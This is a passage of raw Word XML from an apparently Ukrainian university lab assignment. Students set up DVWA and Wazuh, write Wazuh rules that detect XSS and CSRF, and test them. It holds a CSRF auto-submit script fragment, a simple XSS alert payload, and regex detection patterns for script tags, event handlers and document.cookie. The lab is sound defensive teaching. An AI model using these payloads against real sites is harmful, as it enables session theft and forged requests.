        <w:pStyle w:val="a4"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7856972E" w14:textId="5B7E2FD0" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.getElementById('csrf').submit()&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333A09B4" w14:textId="369E2389" w:rsidR="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="00E537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Індикатори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журналах подій</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC610F7" w14:textId="0B9C03A1" w:rsidR="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="002D3E8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Ознаки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>-атак у логах:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B43DC33" w14:textId="19BDA4BE" w:rsidR="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="00674968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тегів </w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E8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2D3E8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параметрах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3E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запиту.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B65C8E5" w14:textId="1B01B561" w:rsidR="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="00674968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обробників подій (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>onload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onerror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onclick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98116C" w14:textId="14FA337E" w:rsidR="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="00674968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Спроби обходу фільтрації за допомогою кодування (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%3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cscript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%3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, &amp;</w:t>
      </w:r>
      <w:r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>gt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D96179A" w14:textId="7D38AE9A" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="00674968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функцій (</w:t>
      </w:r>
      <w:r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(), </w:t>
      </w:r>
      <w:r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eval</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>()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CD99740" w14:textId="2FAEA67A" w:rsidR="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="0067496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Ознаки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 w:rsidRPr="002D3E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атак у логах:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A356D63" w14:textId="082DD2F2" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="00674968">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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3E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запити з підозрілими або сторонніми значеннями заголовка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3E8D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61023001" w14:textId="6D345383" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="00674968">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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="00674968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механізму </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CSRF-token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42836764" w14:textId="04370F76" w:rsidR="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="00674968">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Автоматично сформовані форми з прихованими полями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F58D3C5" w14:textId="73B431EF" w:rsidR="002D3E8D" w:rsidRPr="002D3E8D" w:rsidRDefault="002D3E8D" w:rsidP="00674968">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Запити, що надходять із нетипових або невідомих джерел.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3593549E" w14:textId="17DB8DBF" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E537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3719">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Завдання на лабораторну роботу</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BE45E3" w14:textId="53CAE2C9" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53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середовища.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694B6AF4" w14:textId="66481F2A" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E537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Запустіть сервіси:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D89DEA" w14:textId="2637368B" w:rsidR="00E53719" w:rsidRPr="00C63D08" w:rsidRDefault="00C63D08" w:rsidP="00E53719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sudo </w:t>
      </w:r>
      <w:r w:rsidR="00E53719" w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./lab-management.sh start vuln-lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0AE745" w14:textId="6D3B8C2B" w:rsidR="00E53719" w:rsidRPr="00C63D08" w:rsidRDefault="00C63D08" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4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sudo </w:t>
      </w:r>
      <w:r w:rsidR="00E53719" w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./lab-management.sh start wazuh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108E05A9" w14:textId="18390596" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E537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Відкрийте </w:t>
      </w:r>
      <w:r w:rsidRPr="00E53719">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DVWA</w:t>
      </w:r>
      <w:r w:rsidRPr="00E53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браузері </w:t>
      </w:r>
      <w:r w:rsidRPr="00E53719">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00E5371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0DB2C47" w14:textId="31467A31" w:rsidR="00E53719" w:rsidRPr="005245BC" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="005245BC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13737BB8" w14:textId="35F0D8DD" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E537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Увійдіть</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: admin/password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BC5EBD" w14:textId="14F6DB0D" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E537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Встановіть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DVWA Security: Low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3E4A07" w14:textId="54EB16CD" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719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719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правил виявлення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D7F826" w14:textId="29B75270" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a3"/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терміналі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(хост) за допомогою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F53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відкрийте файл з правилами командою:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5043E399" w14:textId="78E24C14" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53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4BD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>sudo nano /var/lib/docker/volumes/soc-lab_wazuh_etc/_data/rules/local_rules.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7B0CD9" w14:textId="3D376362" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E537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719">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Видаліть правила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створені в попередній лабораторній роботі.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001F22A3" w14:textId="65ADDF09" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E537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Додайте правила виявлення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кінець файлу:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791EA62C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>&lt;!-- XSS Detection Rules --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D9E909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>&lt;group name="xss,web,attack,"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCDCC44" w14:textId="77777777" w:rsidR="00E53719" w:rsidRPr="00C63D08" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B225048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&lt;!-- Detect script tags --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6E8C22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&lt;rule id="100030" level="10"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3202D41C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&lt;if_group&gt;web&lt;/if_group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31901542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&lt;regex type="pcre2"&gt;(?i)(&amp;lt;|%3C)script(&amp;gt;|%3E)&lt;/regex&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8C4BB5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&lt;description&gt;XSS attempt detected: Script tag in request&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44414A93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&lt;mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D6D1EE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  &lt;id&gt;T1189&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274059D9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&lt;/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC3B11F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&lt;/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706EE38D" w14:textId="77777777" w:rsidR="00E53719" w:rsidRPr="00C63D08" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="691C8AA3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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  &lt;!-- Detect JavaScript event handlers --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FF7725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&lt;rule id="100031" level="10"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118A7773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&lt;if_group&gt;web&lt;/if_group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08152250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&lt;regex type="pcre2"&gt;(?i)(onerror|onload|onclick|onmouseover|onfocus)=&lt;/regex&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD21EFF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&lt;description&gt;XSS attempt detected: JavaScript event handler&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FBDE7F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&lt;mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0993A161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  &lt;id&gt;T1189&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA2C7CC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&lt;/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D7DAD7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&lt;/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF33C27" w14:textId="77777777" w:rsidR="00E53719" w:rsidRPr="00C63D08" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07577A0A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&lt;!-- Detect common XSS functions --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F18B41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&lt;rule id="100032" level="12"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A780A3D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&lt;if_group&gt;web&lt;/if_group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2DA6E5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&lt;regex type="pcre2"&gt;(?i)(alert\(|document\.cookie|eval\(|document\.write)&lt;/regex&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646865C6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&lt;description&gt;XSS attempt detected: JavaScript function call&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14153AD1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&lt;mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7E2E42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  &lt;id&gt;T1189&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC154A5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&lt;/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD92065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&lt;/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BCB675" w14:textId="77777777" w:rsidR="00E53719" w:rsidRPr="00C63D08" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB07256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&lt;!-- Detect SVG-based XSS --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451EF9D3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&lt;rule id="100033" level="10"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5062F06A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&lt;if_group&gt;web&lt;/if_group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EADE766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&lt;regex type="pcre2"&gt;(?i)(&amp;lt;|%3C)svg.*onload&lt;/regex&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70932C89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&lt;description&gt;XSS attempt detected: SVG-based XSS&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592086F8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&lt;mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE6B408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  &lt;id&gt;T1189&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60956BE0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&lt;/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F584977" w14:textId="77777777" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590732F2" w14:textId="77777777" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1536AEE9" w14:textId="5A523CC7" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3FE1F4" w14:textId="0D53AECC" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E537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Додайте правила виявлення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кінець файлу:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DA32F5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>&lt;!-- CSRF Detection Rules --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE1942D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>&lt;group name="csrf,web,attack,"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFE84E0" w14:textId="77777777" w:rsidR="00E53719" w:rsidRPr="00C63D08" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="513C4909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&lt;!-- Detect password change without proper referer --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CAB8F0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&lt;rule id="100040" level="8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C257A6C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&lt;if_group&gt;web&lt;/if_group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D653A8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&lt;url&gt;password&lt;/url&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D542661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&lt;regex type="pcre2"&gt;(?i)(password_new|newpass|change_password)&lt;/regex&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6051229D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&lt;description&gt;CSRF attempt detected: Password change request&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A9D6E6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&lt;mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A604AE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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      &lt;id&gt;T1539&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0E59DC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&lt;/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9A0DCE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&lt;/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0310A395" w14:textId="77777777" w:rsidR="00E53719" w:rsidRPr="00C63D08" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30603577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&lt;!-- Detect suspicious referer header --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EFE1C2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&lt;rule id="100041" level="10"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB4C3EB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&lt;if_sid&gt;100040&lt;/if_sid&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CCCC56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&lt;match&gt;"-"&lt;/match&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C7E167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&lt;description&gt;CSRF attempt detected: Password change with missing referer&lt;/description&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1EDDF3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&lt;mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74356939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  &lt;id&gt;T1539&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4012A785" w14:textId="77777777" w:rsidR="00E53719" w:rsidRPr="00C63D08" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/mitre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B15DE1" w14:textId="77777777" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/rule&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6B3BEE" w14:textId="77777777" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="307BBA0A" w14:textId="5E65888C" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECD4B57" w14:textId="182CAA25" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E537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Перезапустіть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wazuh-manager:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7293E107" w14:textId="77777777" w:rsidR="00E53719" w:rsidRPr="000B517F" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Виконайте в терміналі:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4854A6E8" w14:textId="04881228" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B517F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidRPr="00950555">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>docker restart wazuh-manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2091C28B" w14:textId="3B58A745" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E5371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правила виявлення атак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>. Оберіть деякі з них та визначте:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5315C43A" w14:textId="6F80A9A1" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719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ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>правила.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18843C31" w14:textId="77777777" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719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критичності події.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2405D9E7" w14:textId="77777777" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719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Умову спрацювання.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F852BF1" w14:textId="77777777" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719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Регулярний вираз.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F378CC" w14:textId="77777777" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719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 (що саме аналізується у запитах або логах).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516DDF15" w14:textId="77777777" w:rsidR="00E53719" w:rsidRPr="002D2D03" w:rsidRDefault="00E53719" w:rsidP="00E53719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MITRE ATT&amp;CK ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F87A9A" w14:textId="1BA6FDBF" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719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Приклад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2D0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запиту або </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Payload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може викликати спрацювання правила.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70614454" w14:textId="3C6E1D15" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E5371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719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Reflected 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атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675E8BC3" w14:textId="5CBBD498" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E5371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до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E537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Reflected</w:t>
      </w:r>
      <w:r w:rsidRPr="00E537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E53719">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD7A5E2" w14:textId="64AEDAFC" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E5371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Введіть ваше ім’я для тестування.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33532B9D" w14:textId="50C81DA1" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E5371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Спробуйте простий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA3F433" w14:textId="28257F82" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB15D0C" w14:textId="05B4D751" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E5371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спрацювало – побачите спливаюче вікно з текстом </w:t>
      </w:r>
